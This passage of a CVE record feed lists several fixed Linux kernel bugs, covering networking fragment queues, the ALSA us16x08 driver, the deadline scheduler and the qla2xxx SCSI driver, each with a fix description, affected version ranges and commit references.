"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68769",
"datePublished": "2026-01-13T15:28:47.798Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-19T12:18:51.231Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68768 (GCVE-0-2025-68768)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
VLAI?
EPSS
Title
inet: frags: flush pending skbs in fqdir_pre_exit()
Summary
In the Linux kernel, the following vulnerability has been resolved:
inet: frags: flush pending skbs in fqdir_pre_exit()
We have been seeing occasional deadlocks on pernet_ops_rwsem since
September in NIPA. The stuck task was usually modprobe (often loading
a driver like ipvlan), trying to take the lock as a Writer.
lockdep does not track readers for rwsems so the read wasn't obvious
from the reports.
On closer inspection the Reader holding the lock was conntrack looping
forever in nf_conntrack_cleanup_net_list(). Based on past experience
with occasional NIPA crashes I looked thru the tests which run before
the crash and noticed that the crash follows ip_defrag.sh. An immediate
red flag. Scouring thru (de)fragmentation queues reveals skbs sitting
around, holding conntrack references.
The problem is that since conntrack depends on nf_defrag_ipv6,
nf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its
netns exit hooks run _after_ conntrack's netns exit hook.
Flush all fragment queue SKBs during fqdir_pre_exit() to release
conntrack references before conntrack cleanup runs. Also flush
the queues in timer expiry handlers when they discover fqdir->dead
is set, in case packet sneaks in while we're running the pre_exit
flush.
The commit under Fixes is not exactly the culprit, but I think
previously the timer firing would eventually unblock the spinning
conntrack.
Severity ?
No CVSS data available.
Assigner
References
Impacted products
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/inet_frag.h",
"include/net/ipv6_frag.h",
"net/ipv4/inet_fragment.c",
"net/ipv4/ip_fragment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c70df25214ac9b32b53e18e6ae3b8f073ffa6903",
"status": "affected",
"version": "d5dd88794a13c2f24cce31abad7a0a6c5e0ed2db",
"versionType": "git"
},
{
"lessThan": "006a5035b495dec008805df249f92c22c89c3d2e",
"status": "affected",
"version": "d5dd88794a13c2f24cce31abad7a0a6c5e0ed2db",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/inet_frag.h",
"include/net/ipv6_frag.h",
"net/ipv4/inet_fragment.c",
"net/ipv4/ip_fragment.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninet: frags: flush pending skbs in fqdir_pre_exit()\n\nWe have been seeing occasional deadlocks on pernet_ops_rwsem since\nSeptember in NIPA. The stuck task was usually modprobe (often loading\na driver like ipvlan), trying to take the lock as a Writer.\nlockdep does not track readers for rwsems so the read wasn\u0027t obvious\nfrom the reports.\n\nOn closer inspection the Reader holding the lock was conntrack looping\nforever in nf_conntrack_cleanup_net_list(). Based on past experience\nwith occasional NIPA crashes I looked thru the tests which run before\nthe crash and noticed that the crash follows ip_defrag.sh. An immediate\nred flag. Scouring thru (de)fragmentation queues reveals skbs sitting\naround, holding conntrack references.\n\nThe problem is that since conntrack depends on nf_defrag_ipv6,\nnf_defrag_ipv6 will load first. Since nf_defrag_ipv6 loads first its\nnetns exit hooks run _after_ conntrack\u0027s netns exit hook.\n\nFlush all fragment queue SKBs during fqdir_pre_exit() to release\nconntrack references before conntrack cleanup runs. Also flush\nthe queues in timer expiry handlers when they discover fqdir-\u003edead\nis set, in case packet sneaks in while we\u0027re running the pre_exit\nflush.\n\nThe commit under Fixes is not exactly the culprit, but I think\npreviously the timer firing would eventually unblock the spinning\nconntrack."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:47.106Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c70df25214ac9b32b53e18e6ae3b8f073ffa6903"
},
{
"url": "https://git.kernel.org/stable/c/006a5035b495dec008805df249f92c22c89c3d2e"
}
],
"title": "inet: frags: flush pending skbs in fqdir_pre_exit()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68768",
"datePublished": "2026-01-13T15:28:47.106Z",
"dateReserved": "2025-12-24T10:30:51.034Z",
"dateUpdated": "2026-01-13T15:28:47.106Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68783 (GCVE-0-2025-68783)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
ALSA: usb-mixer: us16x08: validate meter packet indices
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-mixer: us16x08: validate meter packet indices
get_meter_levels_from_urb() parses the 64-byte meter packets sent by
the device and fills the per-channel arrays meter_level[],
comp_level[] and master_level[] in struct snd_us16x08_meter_store.
Currently the function derives the channel index directly from the
meter packet (MUB2(meter_urb, s) - 1) and uses it to index those
arrays without validating the range. If the packet contains a
negative or out-of-range channel number, the driver may write past
the end of these arrays.
Introduce a local channel variable and validate it before updating the
arrays. We reject negative indices, limit meter_level[] and
comp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]
updates with ARRAY_SIZE(master_level).
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 53461710a95e15ac1f6542450943a492ecf8e550
(git)
Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 2168866396bd28ec4f3c8da0fbc7d08b5bd4f053 (git) Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < cde47f4ccad6751ac36b7471572ddf38ee91870c (git) Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 2f21a7cbaaa93926f5be15bc095b9c57c35748d9 (git) Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < a8ad320efb663be30b794e3dd3e829301c0d0ed3 (git) Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < eaa95228b8a56c4880a182c0350d67922b22408f (git) Affected: d2bb390a2081a36ffe906724d2848d846f2aeb29 , < 5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/usb/mixer_us16x08.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "53461710a95e15ac1f6542450943a492ecf8e550",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "2168866396bd28ec4f3c8da0fbc7d08b5bd4f053",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "cde47f4ccad6751ac36b7471572ddf38ee91870c",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "2f21a7cbaaa93926f5be15bc095b9c57c35748d9",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "a8ad320efb663be30b794e3dd3e829301c0d0ed3",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "eaa95228b8a56c4880a182c0350d67922b22408f",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
},
{
"lessThan": "5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e",
"status": "affected",
"version": "d2bb390a2081a36ffe906724d2848d846f2aeb29",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/usb/mixer_us16x08.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc3",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc3",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-mixer: us16x08: validate meter packet indices\n\nget_meter_levels_from_urb() parses the 64-byte meter packets sent by\nthe device and fills the per-channel arrays meter_level[],\ncomp_level[] and master_level[] in struct snd_us16x08_meter_store.\n\nCurrently the function derives the channel index directly from the\nmeter packet (MUB2(meter_urb, s) - 1) and uses it to index those\narrays without validating the range. If the packet contains a\nnegative or out-of-range channel number, the driver may write past\nthe end of these arrays.\n\nIntroduce a local channel variable and validate it before updating the\narrays. We reject negative indices, limit meter_level[] and\ncomp_level[] to SND_US16X08_MAX_CHANNELS, and guard master_level[]\nupdates with ARRAY_SIZE(master_level)."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:01.170Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/53461710a95e15ac1f6542450943a492ecf8e550"
},
{
"url": "https://git.kernel.org/stable/c/2168866396bd28ec4f3c8da0fbc7d08b5bd4f053"
},
{
"url": "https://git.kernel.org/stable/c/cde47f4ccad6751ac36b7471572ddf38ee91870c"
},
{
"url": "https://git.kernel.org/stable/c/2f21a7cbaaa93926f5be15bc095b9c57c35748d9"
},
{
"url": "https://git.kernel.org/stable/c/a8ad320efb663be30b794e3dd3e829301c0d0ed3"
},
{
"url": "https://git.kernel.org/stable/c/eaa95228b8a56c4880a182c0350d67922b22408f"
},
{
"url": "https://git.kernel.org/stable/c/5526c1c6ba1d0913c7dfcbbd6fe1744ea7c55f1e"
}
],
"title": "ALSA: usb-mixer: us16x08: validate meter packet indices",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68783",
"datePublished": "2026-01-13T15:28:57.609Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:19:01.170Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68780 (GCVE-0-2025-68780)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
VLAI?
EPSS
Title
sched/deadline: only set free_cpus for online runqueues
Summary
In the Linux kernel, the following vulnerability has been resolved:
sched/deadline: only set free_cpus for online runqueues
Commit 16b269436b72 ("sched/deadline: Modify cpudl::free_cpus
to reflect rd->online") introduced the cpudl_set/clear_freecpu
functions to allow the cpu_dl::free_cpus mask to be manipulated
by the deadline scheduler class rq_on/offline callbacks so the
mask would also reflect this state.
Commit 9659e1eeee28 ("sched/deadline: Remove cpu_active_mask
from cpudl_find()") removed the check of the cpu_active_mask to
save some processing on the premise that the cpudl::free_cpus
mask already reflected the runqueue online state.
Unfortunately, there are cases where it is possible for the
cpudl_clear function to set the free_cpus bit for a CPU when the
deadline runqueue is offline. When this occurs while a CPU is
connected to the default root domain the flag may retain the bad
state after the CPU has been unplugged. Later, a different CPU
that is transitioning through the default root domain may push a
deadline task to the powered down CPU when cpudl_find sees its
free_cpus bit is set. If this happens the task will not have the
opportunity to run.
One example is outlined here:
https://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com
Another occurs when the last deadline task is migrated from a
CPU that has an offlined runqueue. The dequeue_task member of
the deadline scheduler class will eventually call cpudl_clear
and set the free_cpus bit for the CPU.
This commit modifies the cpudl_clear function to be aware of the
online state of the deadline runqueue so that the free_cpus mask
can be updated appropriately.
It is no longer necessary to manage the mask outside of the
cpudl_set/clear functions so the cpudl_set/clear_freecpu
functions are removed. In addition, since the free_cpus mask is
now only updated under the cpudl lock the code was changed to
use the non-atomic __cpumask functions.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
9659e1eeee28f7025b6545934d644d19e9c6e603 , < 9019e399684e3cc68c4a3f050e268f74d69c1317
(git)
Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < fb36846cbcc936954f2ad2bffdff13d16c0be08a (git) Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 91e448e69aca4bb0ba2e998eb3e555644db7322b (git) Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < dbc61834b0412435df21c71410562d933e4eba49 (git) Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8 (git) Affected: 9659e1eeee28f7025b6545934d644d19e9c6e603 , < 382748c05e58a9f1935f5a653c352422375566ea (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/sched/cpudeadline.c",
"kernel/sched/cpudeadline.h",
"kernel/sched/deadline.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9019e399684e3cc68c4a3f050e268f74d69c1317",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "fb36846cbcc936954f2ad2bffdff13d16c0be08a",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "91e448e69aca4bb0ba2e998eb3e555644db7322b",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "dbc61834b0412435df21c71410562d933e4eba49",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
},
{
"lessThan": "382748c05e58a9f1935f5a653c352422375566ea",
"status": "affected",
"version": "9659e1eeee28f7025b6545934d644d19e9c6e603",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/sched/cpudeadline.c",
"kernel/sched/cpudeadline.h",
"kernel/sched/deadline.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.0"
},
{
"lessThan": "4.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "4.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsched/deadline: only set free_cpus for online runqueues\n\nCommit 16b269436b72 (\"sched/deadline: Modify cpudl::free_cpus\nto reflect rd-\u003eonline\") introduced the cpudl_set/clear_freecpu\nfunctions to allow the cpu_dl::free_cpus mask to be manipulated\nby the deadline scheduler class rq_on/offline callbacks so the\nmask would also reflect this state.\n\nCommit 9659e1eeee28 (\"sched/deadline: Remove cpu_active_mask\nfrom cpudl_find()\") removed the check of the cpu_active_mask to\nsave some processing on the premise that the cpudl::free_cpus\nmask already reflected the runqueue online state.\n\nUnfortunately, there are cases where it is possible for the\ncpudl_clear function to set the free_cpus bit for a CPU when the\ndeadline runqueue is offline. When this occurs while a CPU is\nconnected to the default root domain the flag may retain the bad\nstate after the CPU has been unplugged. Later, a different CPU\nthat is transitioning through the default root domain may push a\ndeadline task to the powered down CPU when cpudl_find sees its\nfree_cpus bit is set. If this happens the task will not have the\nopportunity to run.\n\nOne example is outlined here:\nhttps://lore.kernel.org/lkml/20250110233010.2339521-1-opendmb@gmail.com\n\nAnother occurs when the last deadline task is migrated from a\nCPU that has an offlined runqueue. The dequeue_task member of\nthe deadline scheduler class will eventually call cpudl_clear\nand set the free_cpus bit for the CPU.\n\nThis commit modifies the cpudl_clear function to be aware of the\nonline state of the deadline runqueue so that the free_cpus mask\ncan be updated appropriately.\n\nIt is no longer necessary to manage the mask outside of the\ncpudl_set/clear functions so the cpudl_set/clear_freecpu\nfunctions are removed. In addition, since the free_cpus mask is\nnow only updated under the cpudl lock the code was changed to\nuse the non-atomic __cpumask functions."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:58.439Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9019e399684e3cc68c4a3f050e268f74d69c1317"
},
{
"url": "https://git.kernel.org/stable/c/fb36846cbcc936954f2ad2bffdff13d16c0be08a"
},
{
"url": "https://git.kernel.org/stable/c/91e448e69aca4bb0ba2e998eb3e555644db7322b"
},
{
"url": "https://git.kernel.org/stable/c/dbc61834b0412435df21c71410562d933e4eba49"
},
{
"url": "https://git.kernel.org/stable/c/3ed049fbfb4d75b4e0b8ab54c934f485129d5dc8"
},
{
"url": "https://git.kernel.org/stable/c/382748c05e58a9f1935f5a653c352422375566ea"
}
],
"title": "sched/deadline: only set free_cpus for online runqueues",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68780",
"datePublished": "2026-01-13T15:28:55.483Z",
"dateReserved": "2025-12-24T10:30:51.036Z",
"dateUpdated": "2026-01-19T12:18:58.439Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68818 (GCVE-0-2025-68818)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-19 12:19
VLAI?
EPSS
Title
scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path"
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: Revert "scsi: qla2xxx: Perform lockless command completion in abort path"
This reverts commit 0367076b0817d5c75dfb83001ce7ce5c64d803a9.
The commit being reverted added code to __qla2x00_abort_all_cmds() to
call sp->done() without holding a spinlock. But unlike the older code
below it, this new code failed to check sp->cmd_type and just assumed
TYPE_SRB, which results in a jump to an invalid pointer in target-mode
with TYPE_TGT_CMD:
qla2xxx [0000:65:00.0]-d034:8: qla24xx_do_nack_work create sess success
0000000009f7a79b
qla2xxx [0000:65:00.0]-5003:8: ISP System Error - mbx1=1ff5h mbx2=10h
mbx3=0h mbx4=0h mbx5=191h mbx6=0h mbx7=0h.
qla2xxx [0000:65:00.0]-d01e:8: -> fwdump no buffer
qla2xxx [0000:65:00.0]-f03a:8: qla_target(0): System error async event
0x8002 occurred
qla2xxx [0000:65:00.0]-00af:8: Performing ISP error recovery -
ha=0000000058183fda.
BUG: kernel NULL pointer dereference, address: 0000000000000000
PF: supervisor instruction fetch in kernel mode
PF: error_code(0x0010) - not-present page
PGD 0 P4D 0
Oops: 0010 [#1] SMP
CPU: 2 PID: 9446 Comm: qla2xxx_8_dpc Tainted: G O 6.1.133 #1
Hardware name: Supermicro Super Server/X11SPL-F, BIOS 4.2 12/15/2023
RIP: 0010:0x0
Code: Unable to access opcode bytes at 0xffffffffffffffd6.
RSP: 0018:ffffc90001f93dc8 EFLAGS: 00010206
RAX: 0000000000000282 RBX: 0000000000000355 RCX: ffff88810d16a000
RDX: ffff88810dbadaa8 RSI: 0000000000080000 RDI: ffff888169dc38c0
RBP: ffff888169dc38c0 R08: 0000000000000001 R09: 0000000000000045
R10: ffffffffa034bdf0 R11: 0000000000000000 R12: ffff88810800bb40
R13: 0000000000001aa8 R14: ffff888100136610 R15: ffff8881070f7400
FS: 0000000000000000(0000) GS:ffff88bf80080000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: ffffffffffffffd6 CR3: 000000010c8ff006 CR4: 00000000003706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
? __die+0x4d/0x8b
? page_fault_oops+0x91/0x180
? trace_buffer_unlock_commit_regs+0x38/0x1a0
? exc_page_fault+0x391/0x5e0
? asm_exc_page_fault+0x22/0x30
__qla2x00_abort_all_cmds+0xcb/0x3e0 [qla2xxx_scst]
qla2x00_abort_all_cmds+0x50/0x70 [qla2xxx_scst]
qla2x00_abort_isp_cleanup+0x3b7/0x4b0 [qla2xxx_scst]
qla2x00_abort_isp+0xfd/0x860 [qla2xxx_scst]
qla2x00_do_dpc+0x581/0xa40 [qla2xxx_scst]
kthread+0xa8/0xd0
</TASK>
Then commit 4475afa2646d ("scsi: qla2xxx: Complete command early within
lock") added the spinlock back, because not having the lock caused a
race and a crash. But qla2x00_abort_srb() in the switch below already
checks for qla2x00_chip_is_down() and handles it the same way, so the
code above the switch is now redundant and still buggy in target-mode.
Remove it.
Severity ?
No CVSS data available.
Assigner
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Linux | Linux |
Affected:
231cfa78ec5badd84a1a2b09465bfad1a926aba1 , < b04b3733fff7e94566386b962e4795550fbdfd3d
(git)
Affected: d6f7377528d2abf338e504126e44439541be8f7d , < 50b097d92c99f718831b8b349722bc79f718ba1b (git) Affected: cd0a1804ac5bab2545ac700c8d0fe9ae9284c567 , < c5c37a821bd1708f26a9522b4a6f47b9f7a20003 (git) Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < e9e601b7df58ba0c667baf30263331df2c02ffe1 (git) Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < b10ebbfd59a535c8d22f4ede6e8389622ce98dc0 (git) Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < 1c728951bc769b795d377852eae1abddad88635d (git) Affected: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 , < b57fbc88715b6d18f379463f48a15b560b087ffe (git) Affected: 9189f20b4c5307c0998682bb522e481b4567a8b8 (git) Affected: 415d614344a4f1bbddf55d724fc7eb9ef4b39aad (git) |
|||||||
|
|||||||||
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b04b3733fff7e94566386b962e4795550fbdfd3d",
"status": "affected",
"version": "231cfa78ec5badd84a1a2b09465bfad1a926aba1",
"versionType": "git"
},
{
"lessThan": "50b097d92c99f718831b8b349722bc79f718ba1b",
"status": "affected",
"version": "d6f7377528d2abf338e504126e44439541be8f7d",
"versionType": "git"
},
{
"lessThan": "c5c37a821bd1708f26a9522b4a6f47b9f7a20003",
"status": "affected",
"version": "cd0a1804ac5bab2545ac700c8d0fe9ae9284c567",
"versionType": "git"
},
{
"lessThan": "e9e601b7df58ba0c667baf30263331df2c02ffe1",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "b10ebbfd59a535c8d22f4ede6e8389622ce98dc0",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "1c728951bc769b795d377852eae1abddad88635d",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "b57fbc88715b6d18f379463f48a15b560b087ffe",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"status": "affected",
"version": "9189f20b4c5307c0998682bb522e481b4567a8b8",
"versionType": "git"
},
{
"status": "affected",
"version": "415d614344a4f1bbddf55d724fc7eb9ef4b39aad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
